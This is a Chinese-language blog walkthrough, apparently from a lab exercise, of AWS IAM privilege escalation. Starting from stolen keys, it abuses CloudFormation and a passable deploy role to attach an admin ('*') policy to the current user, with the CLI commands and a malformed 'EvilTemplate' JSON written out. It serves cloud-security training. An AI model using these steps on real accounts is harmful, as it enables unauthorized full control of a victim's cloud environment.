AWS云安全系列10 - IAM CloudFormation

admin 2022年4月28日18:17:32云安全评论15 views1552字阅读5分10秒阅读模式

国内云安全培训请点击原文或访问以下链接

https://www.yuque.com/u8047536/supvqp/ri4ft0


前提是已经获取了相关的密钥


步骤 1:将 AWS CLI配置为访问凭证


AWS云安全系列10 - IAM CloudFormation


步骤 2:列出附加到用户的 AWS 托管策略

aws iam list-attached-user-policies --user-name xx aws iam list-user-policies --user-name xx

AWS云安全系列10 - IAM CloudFormation


步骤 3:尝试在AWS账户上创建用户。


aws iam create-user --user-name Bob

AWS云安全系列10 - IAM CloudFormation

由于权限不足,用户创建失败


步骤 4: 查看策略权限和详细信息


aws iam get-user-policy --user-name xx student --policy-name terraform-20210213071506259200000001


AWS云安全系列10 - IAM CloudFormation

 xx用户可以  执行各种云表单操作


步骤 5:列出 AWS 账户上可传递给 CloudFormation 服务的角色


aws iam list roles

AWS云安全系列10 - IAM CloudFormation


步骤 6: 查看 lab12CFDeploy角色的详细信息


aws iam list-role-policies --role-name lab12CFDeployRoleaws iam get-role-policy --role-name lab12CFDeployRole --policy-name terraform-20210213071506289900000002

AWS云安全系列10 - IAM CloudFormation


AWS云安全系列10 - IAM CloudFormation


步骤 7:创建包含以下内容的 JSON 文件


{  "Resources": {    "EvilTemplate": {      "Type": "AWS::IAM::Policy",      "Properties": {        "PolicyName": "admin_policy",        "PolicyDocument": {          "Version": "2012-10-17",
"Statement": []
{ "Effect": "Allow", "Action": "*", "Resource": "*" }
}, "Users": [ "xx" ] } } }}

AWS云安全系列10 - IAM CloudFormation


步骤 8:借助创建的 JSON 文件,在AWS 账户上创建新的cloudformation stack


aws cloudformation create-stack --stack-name ad-stack --template-body file://new_policy.json --capabilities CAPABILITY_NAMED_IAM --role-arn arn:aws:iam::1xxxxxxx4:role/lab12CFDeployRole


AWS云安全系列10 - IAM CloudFormation


步骤 9:  检查stack信息并检查stack执行事件状态


aws cloudformation describe-stacks --stack-name ad-stackaws cloudformation describe-stack-events --stack-name ad-stack

AWS云安全系列10 - IAM CloudFormation

已成功执行stack


步骤 10:检查 xx用户的用户策略

aws iam list-user-policies --user-name xx

AWS云安全系列10 - IAM CloudFormation


第 11 步:查看admin_policy的详细信息


aws iam get-user-policy --user-name xx --policy-name admin_policy


AWS云安全系列10 - IAM CloudFormation


步骤 12:尝试AWS 账户 上创建新用户以验证管理员访问权限

 aws iam create-user --user-name Bob

AWS云安全系列10 - IAM CloudFormation

已成功执行特权操作

 

References:

 

1.AWSCLI(https://docs.aws.amazon.com/cli/latest/reference/)

原文始发于微信公众号(关注安全技术):AWS云安全系列10 - IAM CloudFormation

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年4月28日18:17:32
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  AWS云安全系列10 - IAM CloudFormation http://cn-sec.com/archives/958038.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: